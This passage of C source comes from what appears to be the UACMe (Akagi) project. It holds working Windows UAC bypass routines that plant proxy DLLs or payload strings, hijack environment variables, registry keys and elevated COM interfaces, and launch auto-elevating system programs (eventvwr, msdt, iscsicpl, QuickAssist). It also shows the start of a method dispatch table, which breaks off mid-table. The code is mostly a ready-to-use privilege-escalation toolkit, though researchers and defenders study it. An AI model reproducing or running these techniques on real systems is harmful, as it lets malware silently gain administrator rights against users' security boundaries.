* http://seclists.org/fulldisclosure/2017/Jul/11
*
*/
NTSTATUS ucmCorProfilerMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    SIZE_T sz = 0;
    GUID guid;
    HKEY hKey = NULL;
    LRESULT lResult;
    LPOLESTR OutputGuidString = NULL;
    WCHAR szBuffer[MAX_PATH * 2], szRegBuffer[MAX_PATH * 4];

    do {

        //
        // Create unique GUID
        //
        if (CoCreateGuid(&guid) != S_OK)
            break;

        if (StringFromCLSID(&guid, &OutputGuidString) != S_OK)
            break;

        _strcpy(szBuffer, g_ctx->szTempDirectory);
        _strcat(szBuffer, MYSTERIOUSCUTETHING);
        _strcat(szBuffer, TEXT(".dll"));
        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
            break;

        supSetEnvVariable(FALSE, NULL, COR_ENABLE_PROFILING, TEXT("1"));
        supSetEnvVariable(FALSE, NULL, COR_PROFILER, OutputGuidString);

        if (g_ctx->dwBuildNumber >= NT_WIN8_RTM) {
            supSetEnvVariable(FALSE, NULL, COR_PROFILER_PATH, szBuffer);
        }
        else {

            //
            // On Windows 7 target written on 3+ dotnet, registration required.
            //
            _strcpy(szRegBuffer, T_REG_SOFTWARECLASSESCLSID);
            _strcat(szRegBuffer, OutputGuidString);
            _strcat(szRegBuffer, T_REG_INPROCSERVER32);

            hKey = NULL;
            lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
                szRegBuffer,
                0,
                NULL,
                REG_OPTION_NON_VOLATILE,
                KEY_ALL_ACCESS,
                NULL,
                &hKey,
                NULL);

            if (lResult == ERROR_SUCCESS) {

                sz = (1 + _strlen(szBuffer)) * sizeof(WCHAR);
                lResult = RegSetValueEx(hKey,
                    TEXT(""),
                    0,
                    REG_SZ,
                    (BYTE*)szBuffer,
                    (DWORD)sz);

                if (lResult == ERROR_SUCCESS) {
                    _strcpy(szRegBuffer, T_APARTMENT);
                    sz = (1 + _strlen(szRegBuffer)) * sizeof(WCHAR);
                    RegSetValueEx(hKey,
                        T_THREADINGMODEL,
                        0,
                        REG_SZ,
                        (BYTE*)szRegBuffer,
                        (DWORD)sz);
                }

                RegCloseKey(hKey);
            }
        }

        //
        // Load target app and trigger cor profiler, eventvwr snap-in is written in the dotnet.
        //
        if (supRunProcess2(MMC_EXE, EVENTVWR_MSC, NULL, SW_SHOW, SUPRUNPROCESS_TIMEOUT_DEFAULT)) {
            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    //
    // Cleanup.
    //
    if (OutputGuidString != NULL) {
        supSetEnvVariable(TRUE, NULL, COR_PROFILER, NULL);
        CoTaskMemFree(OutputGuidString);
    }

    supSetEnvVariable(TRUE, NULL, COR_ENABLE_PROFILING, NULL);

    if (g_ctx->dwBuildNumber >= NT_WIN8_RTM)
        supSetEnvVariable(TRUE, NULL, COR_PROFILER_PATH, NULL);

    return MethodResult;
}

/*
* ucmDccwCOMMethod
*
* Purpose:
*
* Bypass UAC using ColorDataProxy/CMLuaUtil undocumented COM interfaces.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmDccwCOMMethod(
    _In_ LPWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT r = E_FAIL, hr_init;
    SIZE_T sz = 0;
    ICMLuaUtil* CMLuaUtil = NULL;
    IColorDataProxy* ColorDataProxy = NULL;

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        sz = _strlen(lpszPayload);
        if (sz == 0) {
            MethodResult = STATUS_INVALID_PARAMETER;
            break;
        }

        //
        // Create elevated COM object for CMLuaUtil.
        //
        r = ucmAllocateElevatedObject(
            T_CLSID_CMSTPLUA,
            &IID_ICMLuaUtil,
            CLSCTX_LOCAL_SERVER,
            &CMLuaUtil);

        if (r != S_OK) {
            break;
        }

        if (CMLuaUtil == NULL) {
            break;
        }

        //
        // Write new custom calibrator value to HKLM.
        //
        r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,
            HKEY_LOCAL_MACHINE,
            T_DISPLAY_CALIBRATION,
            T_CALIBRATOR_VALUE,
            lpszPayload);

        if (FAILED(r)) {
            break;
        }

        //
        // Create elevated COM object for ColorDataProxy.
        //
        r = ucmAllocateElevatedObject(
            T_CLSID_ColorDataProxy,
            &IID_IColorDataProxy,
            CLSCTX_LOCAL_SERVER,
            &ColorDataProxy);

        if (r != S_OK) {
            break;
        }

        if (ColorDataProxy == NULL) {
            break;
        }

        //
        // Run our "custom calibrator".
        //
        r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);
        if (SUCCEEDED(r))
            MethodResult = STATUS_SUCCESS;

        Sleep(1000);

        //
        // Remove calibrator value.
        //
        CMLuaUtil->lpVtbl->DeleteRegistryStringValue(CMLuaUtil,
            HKEY_LOCAL_MACHINE,
            T_DISPLAY_CALIBRATION,
            T_CALIBRATOR_VALUE);

    } while (FALSE);

    if (CMLuaUtil != NULL) {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }

    if (ColorDataProxy != NULL) {
        ColorDataProxy->lpVtbl->Release(ColorDataProxy);
    }

    //
    // Balance every successful CoInitializeEx (S_OK or S_FALSE), but not a
    // failed one such as RPC_E_CHANGED_MODE.
    //
    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return MethodResult;
}

/*
* ucmJunctionMethod
*
* Purpose:
*
* Bypass UAC using two different steps:
*
* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.
* 2) Disemer
*
* Wusa race condition in combination with junctions found by Thomas Vanhoutte.
*
*/
NTSTATUS ucmJunctionMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    DWORD i, cNames;
    LPWSTR lpEnd;
    WCHAR szBuffer[MAX_PATH * 2];

    //
    // Drop payload dll to %temp% and make cab for it.
    //
    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;

    for (i = 0; i < cNames; i++) {

        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy(szBuffer, g_ctx->szTempDirectory);
        _strcat(szBuffer, g_DismTargets[i]);

        if (ucmCreateCabinetForSingleFile(szBuffer, ProxyDll, ProxyDllSize, NULL)) {

            _strcpy(szBuffer, g_ctx->szSystemDirectory);
            lpEnd = _strend(szBuffer);
            if (*(lpEnd - 1) == TEXT('\\'))
                *(lpEnd - 1) = TEXT('\0');

            if (ucmWusaExtractViaJunction(szBuffer)) {
                //
                // Run target.
                //
                MethodResult = ucmxDisemer();
            }

            ucmWusaCabinetCleanup();
        }
    }

#ifdef _DEBUG
    supSetGlobalCompletionEvent();
#endif

    return MethodResult;
}

/*
* ucmMsdtMethod
*
* Purpose:
*
* Bypass UAC by dll hijack of sdiagnhost.
* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
*
*/
NTSTATUS ucmMsdtMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOLEAN bCleanupNeeded = FALSE;
    UINT i;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
#ifndef _WIN64
    NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
#endif
    WCHAR szPath[MAX_PATH * 2];
    WCHAR szApp[MAX_PATH + 1];
    WCHAR szParams[MAX_PATH * 2];

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        ntStatus = supEnableDisableWow64Redirection(TRUE);
        if (!NT_SUCCESS(ntStatus))
            return ntStatus;
    }
#endif

    do {

        RtlSecureZeroMemory(&szPath, sizeof(szPath));
        if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
            break;

        supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
        supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);

        if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
            break;

        bCleanupNeeded = TRUE;

        _strcpy(szApp, g_ctx->szSystemRoot);
        supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
        supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);

        _strcpy(szParams, TEXT("-path "));
        _strcat(szParams, g_ctx->szSystemRoot);
        _strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));

        if (supRunProcess2(szApp, szParams, NULL, SW_HIDE, 10000)) {
            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    if (bCleanupNeeded) {
        i = 5;
        do {
            if (DeleteFile(szPath))
                break;
            Sleep(1000);
            i--;
        } while (i);
    }

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        supEnableDisableWow64Redirection(FALSE);
    }
#endif

#ifdef _DEBUG
    supSetGlobalCompletionEvent();
#endif

    return MethodResult;
}

/*
* ucmDotNetSerialMethod
*
* Purpose:
*
* Bypass UAC using DotNet Deserialization for eventvwr.
*
*/
NTSTATUS ucmDotNetSerialMethod(
    _In_ LPWSTR lpszPayload
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HANDLE hProcess = NULL;
    PVOID dataBuffer;
    DWORD dataSize;
    LPWSTR lpAppData = NULL, lpTargetPath = NULL;
    SIZE_T memIO;
    WCHAR szTarget[MAX_PATH * 2];

    do {

        //
        // Set payload as environment variable.
// supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload); // // Drop RecentViews cache element to %AppData%. // if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData))) break; memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR); lpTargetPath = (LPWSTR)supHeapAlloc(memIO); if (lpTargetPath == NULL) break; _strcpy(lpTargetPath, lpAppData); _strcat(lpTargetPath, TEXT("\\Microsoft\\Event Viewer\\RecentViews")); if (g_ctx->dwBuildNumber < NT_WIN8_RTM) { dataBuffer = (PVOID)g_encodedRecentViewsV2; dataSize = sizeof(g_encodedRecentViewsV2); } else { dataBuffer = (PVOID)g_encodedRecentViews; dataSize = sizeof(g_encodedRecentViews); } if (!supDecodeAndWriteBufferToFile(lpTargetPath, (CONST PVOID)dataBuffer, dataSize, 'zzzz')) { break; } // // Run eventvwr.exe as final trigger. // _strcpy(szTarget, g_ctx->szSystemDirectory); _strcat(szTarget, MMC_EXE); hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW); if (hProcess) { supWaitForChildProcesses(MMC_EXE, 50 * 1000); CloseHandle(hProcess); MethodResult = STATUS_SUCCESS; } } while (FALSE); CoTaskMemFree(lpAppData); if (lpTargetPath) { DeleteFile(lpTargetPath); supHeapFree(lpTargetPath); } supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL); return MethodResult; } /* * ucmIscsiCplMethodCleanup * * Purpose: * * Post execution cleanup routine. * */ VOID ucmIscsiCplMethodCleanup( VOID ) { WCHAR szBuffer[MAX_PATH * 2]; _strcpy(szBuffer, g_ctx->szTempDirectory); _strcat(szBuffer, ISCSIEXE_DLL); DeleteFile(szBuffer); } /* * ucmIscsiCplMethod * * Purpose: * * Bypass UAC by dll hijack of iscsicpl. 
* https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC
*
*/
NTSTATUS ucmIscsiCplMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL bValueSet = FALSE;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    SIZE_T nLen;
    WCHAR* pszOldEnvValue = NULL;
    WCHAR szBuffer[MAX_PATH * 2];

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        MethodResult = supEnableDisableWow64Redirection(TRUE);
        if (!NT_SUCCESS(MethodResult))
            return MethodResult;
    }
#endif

    do {

        _strcpy(szBuffer, g_ctx->szTempDirectory);
        nLen = _strlen(szBuffer);
        if (szBuffer[nLen - 1] == L'\\') {
            szBuffer[nLen - 1] = 0;
        }

        bValueSet = supReplaceEnvironmentVariableValue(NULL,
            TEXT("Path"),
            REG_EXPAND_SZ,
            szBuffer,
            (PVOID*)&pszOldEnvValue);

        if (!bValueSet)
            break;

        _strcpy(szBuffer, g_ctx->szTempDirectory);
        _strcat(szBuffer, ISCSIEXE_DLL);
        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
            break;

        _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
        _strcat(szBuffer, SYSWOW64_DIR);
        _strcat(szBuffer, ISCSICPL_EXE);

        if (supRunProcess2(szBuffer, NULL, NULL, SW_HIDE, 5000))
            MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    if (pszOldEnvValue) {
        supReplaceEnvironmentVariableValue(NULL,
            TEXT("Path"),
            REG_EXPAND_SZ,
            pszOldEnvValue,
            NULL);
        supHeapFree(pszOldEnvValue);
    }
    else {
        supRegCurrentUserDeleteSubKeyValue(TEXT("Environment"), TEXT("Path"));
    }

#ifndef _WIN64
    if (g_ctx->IsWow64) {
        supEnableDisableWow64Redirection(FALSE);
    }
#endif

#ifdef _DEBUG
    supSetGlobalCompletionEvent();
#endif

    return MethodResult;
}

/*
* ucmRequestTraceMethod
*
* Purpose:
*
* Bypass UAC by environment variables hijack and dll planting.
* https://github.com/R41N3RZUF477/RequestTrace_UAC_Bypass
*
*/
NTSTATUS ucmRequestTraceMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL fDirCreated = FALSE, fEnvSet = FALSE;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    SIZE_T PayloadDirNameLen = 0, nLen;
    WCHAR szBuffer[MAX_PATH + 1];
    WCHAR szPayloadDir[MAX_PATH * 2];
    UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);
    INPUT inputs[8];

    do {

        //
        // Create destination dir "system32" in %temp%.
        //
        _strcpy(szPayloadDir, g_ctx->szTempDirectory);
        _strcat(szPayloadDir, SYSTEM32_DIR_NAME);
        PayloadDirNameLen = _strlen(szPayloadDir);

        if (!CreateDirectory(szPayloadDir, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;
        }

        fDirCreated = TRUE;

        _strcat(szPayloadDir, TEXT("\\"));
        _strcat(szPayloadDir, PERFORMANCETRACEHANDLER_DLL);
        if (!supWriteBufferToFile(szPayloadDir, ProxyDll, ProxyDllSize))
            break;

        //
        // Set new %SystemRoot% environment variable.
        //
        _strcpy(szBuffer, g_ctx->szTempDirectory);
        nLen = _strlen(szBuffer);
        if (szBuffer[nLen - 1] == L'\\') {
            szBuffer[nLen - 1] = 0;
        }

        fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, T_SYSTEMROOT, szBuffer);
        if (fEnvSet == FALSE)
            break;

        supEnumProcessesForSession(NtCurrentPeb()->SessionId,
            (pfnEnumProcessCallback)supEnumTaskhostTasksCallback,
            (PVOID)&uStrTaskhost);

        RtlSecureZeroMemory(&inputs[0], sizeof(inputs));

        //
        // Simulate LSHIFT+LCONTROL+LWIN+T.
        //
        inputs[0].type = INPUT_KEYBOARD;
        inputs[0].ki.wVk = VK_LSHIFT;

        inputs[1].type = INPUT_KEYBOARD;
        inputs[1].ki.wVk = VK_LCONTROL;

        inputs[2].type = INPUT_KEYBOARD;
        inputs[2].ki.wVk = VK_LWIN;

        inputs[3].type = INPUT_KEYBOARD;
        inputs[3].ki.wVk = 'T';

        inputs[4].type = INPUT_KEYBOARD;
        inputs[4].ki.wVk = 'T';
        inputs[4].ki.dwFlags = KEYEVENTF_KEYUP;

        inputs[5].type = INPUT_KEYBOARD;
        inputs[5].ki.wVk = VK_LWIN;
        inputs[5].ki.dwFlags = KEYEVENTF_KEYUP;

        inputs[6].type = INPUT_KEYBOARD;
        inputs[6].ki.wVk = VK_LCONTROL;
        inputs[6].ki.dwFlags = KEYEVENTF_KEYUP;

        inputs[7].type = INPUT_KEYBOARD;
        inputs[7].ki.wVk = VK_LSHIFT;
        inputs[7].ki.dwFlags = KEYEVENTF_KEYUP;

        SendInput(8, &inputs[0], sizeof(INPUT));

        Sleep(5000);

        MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    if (fEnvSet)
        supSetEnvVariable(TRUE, T_VOLATILE_ENV, T_SYSTEMROOT, NULL);

    if (fDirCreated) {
        DeleteFile(szPayloadDir);
        szPayloadDir[PayloadDirNameLen] = 0;
        RemoveDirectory(szPayloadDir);
    }

    return MethodResult;
}

/*
* ucmxModifyWebviewExecutableFolderPolicy
*
* Purpose:
*
* Alter WebView BrowserExecutableFolder parameter.
*
*/
BOOLEAN ucmxModifyWebviewExecutableFolderPolicy(
    _In_ LPCWSTR lpPayloadPath
)
{
    BOOLEAN bResult = FALSE;
    HKEY hKey = NULL;

    if (ERROR_SUCCESS == RegCreateKeyEx(HKEY_CURRENT_USER,
        T_WEBVIEW_POLICY,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        MAXIMUM_ALLOWED,
        NULL,
        &hKey,
        NULL))
    {
        bResult = (RegSetValueEx(hKey,
            QUICKASSIST_EXE,
            0,
            REG_SZ,
            (const BYTE*)lpPayloadPath,
            ((DWORD)_strlen(lpPayloadPath) * sizeof(WCHAR)) + sizeof(UNICODE_NULL)) == ERROR_SUCCESS);

        RegCloseKey(hKey);
    }

    return bResult;
}

/*
* ucmxRunQuickAssist
*
* Purpose:
*
* Execute quick assist through direct exe start or protocol.
*
*/
HANDLE ucmxRunQuickAssist()
{
    WCHAR szBuffer[MAX_PATH * 2];
    SHELLEXECUTEINFO shinfo;

    _strcpy(szBuffer, g_ctx->szSystemDirectory);
    _strcat(szBuffer, QUICKASSIST_EXE);

    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpVerb = NULL;
    shinfo.lpParameters = NULL;
    shinfo.nShow = SW_MINIMIZE;

    if (GetFileAttributes(szBuffer) != INVALID_FILE_ATTRIBUTES) {
        shinfo.lpFile = szBuffer;
    }
    else {
        shinfo.lpFile = T_QUICKASSIST;
    }

    if (ShellExecuteEx(&shinfo)) {
        return shinfo.hProcess;
    }

    return NULL;
}

/*
* ucmQuickAssistMethod
*
* Purpose:
*
* Bypass UAC by environment variables hijack and dll planting.
* https://github.com/R41N3RZUF477/QuickAssist_UAC_Bypass
*
*/
NTSTATUS ucmQuickAssistMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL fDirCreated = FALSE, fEnvSet = FALSE;
    HANDLE hProcess;
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    WCHAR szPayloadPath[MAX_PATH * 2];
    WCHAR szPayloadFile[MAX_PATH * 2];

    do {

        //
        // Select payload entry point.
        //
        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_ENTRYPOINT_QASSIST,
            FALSE))
        {
            break;
        }

        //
        // Create destination dir "EBWebView\x64" in %temp%.
        //
        _strcpy(szPayloadPath, g_ctx->szTempDirectory);
        _strcat(szPayloadPath, WEBVIEW_DIR);

        if (!CreateDirectory(szPayloadPath, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;
        }

        _strcat(szPayloadPath, L"\\x64");

        if (!CreateDirectory(szPayloadPath, NULL)) {
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;
        }

        //
        // Drop payload and alter its version info block.
        //
        _strcpy(szPayloadFile, szPayloadPath);
        _strcat(szPayloadFile, TEXT("\\"));
        _strcat(szPayloadFile, EMBEDDEDBROWSERWEBVIEW_DLL);

        if (!supWriteBufferToFile(szPayloadFile, ProxyDll, ProxyDllSize))
            break;

        fDirCreated = TRUE;

        if (!supReplaceVersionInfo(szPayloadFile,
            (PBYTE)g_webviewvsinfo,
            sizeof(g_webviewvsinfo),
            'qass'))
            break;

        //
        // Relay WebView.
        //
        if (!ucmxModifyWebviewExecutableFolderPolicy(szPayloadPath)) {
            fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, g_ctx->szTempDirectory);
            if (fEnvSet == FALSE)
                break;
        }

        //
        // Run quick assist.
        //
        hProcess = ucmxRunQuickAssist();
        if (hProcess == NULL)
            break;

        if (WaitForSingleObject(hProcess, 15000) != WAIT_OBJECT_0) {
            TerminateProcess(hProcess, 0);
            CloseHandle(hProcess);
            break;
        }

        CloseHandle(hProcess);
        MethodResult = STATUS_SUCCESS;

    } while (FALSE);

    supSetGlobalCompletionEvent();
    Sleep(1000);

    if (fEnvSet)
        supSetEnvVariable(TRUE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, NULL);

    if (fDirCreated) {
        _strcpy(szPayloadPath, g_ctx->szTempDirectory);
        _strcat(szPayloadPath, WEBVIEW_DIR);
        supRemoveDirectoryRecursive(szPayloadPath);
    }

    return MethodResult;
}


================================================
FILE: Source/Akagi/methods/methods.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2025
*
*  TITLE:       METHODS.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  UAC bypass dispatch.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

UCM_API(MethodTest);
UCM_API(MethodSXS);
UCM_API(MethodDism);
UCM_API(MethodWow64Logger);
UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodJunction);
UCM_API(MethodSXSDccw);
UCM_API(MethodHakril);
UCM_API(MethodCorProfiler);
UCM_API(MethodCMLuaUtil);
UCM_API(MethodDccwCOM);
UCM_API(MethodDirectoryMock);
UCM_API(MethodShellSdctl);
UCM_API(MethodTokenModUIAccess);
UCM_API(MethodEditionUpgradeManager);
UCM_API(MethodDebugObject);
UCM_API(MethodShellChangePk);
UCM_API(MethodNICPoison);
UCM_API(MethodDeprecated);
UCM_API(MethodIeAddOnInstall);
UCM_API(MethodWscActionProtocol);
UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
UCM_API(MethodMsdt);
UCM_API(MethodDotNetSerial);
UCM_API(MethodVFServerTaskSched);
UCM_API(MethodVFServerDiagProf);
UCM_API(MethodIscsiCpl);
UCM_API(MethodAtlHijack);
UCM_API(MethodSspiDatagram);
UCM_API(MethodRequestTrace);
UCM_API(MethodQuickAssist);

ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
    UacMethodWow64Logger,
    UacMethodEditionUpgradeMgr,
    UacMethodNICPoison,
    UacMethodIeAddOnInstall,
    UacMethodWscActionProtocol,
    UacMethodFwCplLua2,
    UacMethodMsSettingsProtocol,
    UacMethodMsStoreProtocol,
    UacMethodPca,
    UacMethodCurVer,
    UacMethodVFServerTaskSched,
    UacMethodVFServerDiagProf,
    UacMethodAtlHijack,
    UacMethodSspiDatagram,
    UacMethodRequestTrace,
    UacMethodQuickAssist
};

UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
    { MethodTest, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodSXS, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodDism, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodWow64Logger, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodUiAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodMsSettings, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodTyranid, { NT_WIN8_BLUE, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodJunction, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodSXSDccw, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodHakril, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, FALSE, TRUE },
    { MethodCorProfiler, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodCMLuaUtil, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDccwCOM, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
